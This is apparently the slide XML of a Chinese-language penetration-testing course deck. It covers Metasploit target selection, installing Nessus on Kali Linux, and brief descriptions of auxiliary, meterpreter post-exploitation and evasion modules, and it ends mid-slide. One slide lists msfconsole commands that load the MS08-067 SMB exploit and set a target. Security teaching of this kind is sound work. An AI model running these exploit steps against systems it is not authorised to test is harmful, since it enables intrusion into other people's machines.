          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617720" y="2051540"/>
            <a:ext cx="10933112" cy="3451225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>一些渗透测试模块可能支持多个系统架构。一般情况下，支持多系统架构的渗透测试模块默认都是自动。当用户发起攻击后，渗透测试模块将自动根据探测的目标信息来选择目标。如果用户确认目标主机的架构，也可以手动设置其架构，以提高渗透测试效率。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>msf5&gt; use exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/ms08_067_netapi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>msf5 exploit(windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/ms08_067_netapi)&gt;show targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>msf5 exploit(windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/ms08_067_netapi)&gt;set target 2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1431944461"/>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44384" y="948334"/>
            <a:ext cx="8229600" cy="1252537"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="488136" y="2113189"/>
            <a:ext cx="11215728" cy="3451225"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Kali Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>中，默认没有安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>工具。所以，如果要使用该工具实施漏洞扫描，则需要先安装。而且，当用户成功安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>工具后，还必须要激活该服务才可使用。下面将介绍安装并激活</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>工具的方法。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>服务</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>激活</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>服务</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>之前，必须先启动该服务才可使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>nessusd.service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://bogon:8834</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC42341B-A4C2-23D7-2320-F8D0879714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4983" y="1974496"/>
            <a:ext cx="4184363" cy="3816294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63E43BDD-D2B0-88C3-5A57-028B22D15838}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="84222" y="22188"/>
            <a:ext cx="3115710" cy="817056"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="731579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19270" y="1120016"/>
            <a:ext cx="10972800" cy="1252537"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>辅助模块</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="770626" y="2169353"/>
            <a:ext cx="10321444" cy="1653347"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>        辅助模块包括针对各种网络服务的扫描与检测，构建虚假服务收集登录密码、口令猜测等模块。另外，辅助模块中还包括一些无须加载的攻击载荷，这些模块不用来取得目标系统远程控制权，如拒绝服务攻击。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="标题 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="119270" y="3822700"/>
            <a:ext cx="10972800" cy="12525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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>后渗透攻击模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="华文新楷"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本占位符 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="855395" y="5075237"/>
            <a:ext cx="10422205" cy="17681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itchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>      后渗透攻击模块主要用于取得目标系统远程控制权之后的环节，实现在受控制系统中进行各种各样的后渗透攻击动作，如获取敏感信息，进一步拓展，实施跳板攻击等。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20686705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84313" y="1133270"/>
            <a:ext cx="10972800" cy="1070104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>规避</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>模块</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="770626" y="2203374"/>
            <a:ext cx="10586487" cy="1821015"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>        规避模块是在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Metasploit 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>中新增加的。用户可以使用规避模块来规避</a:t>
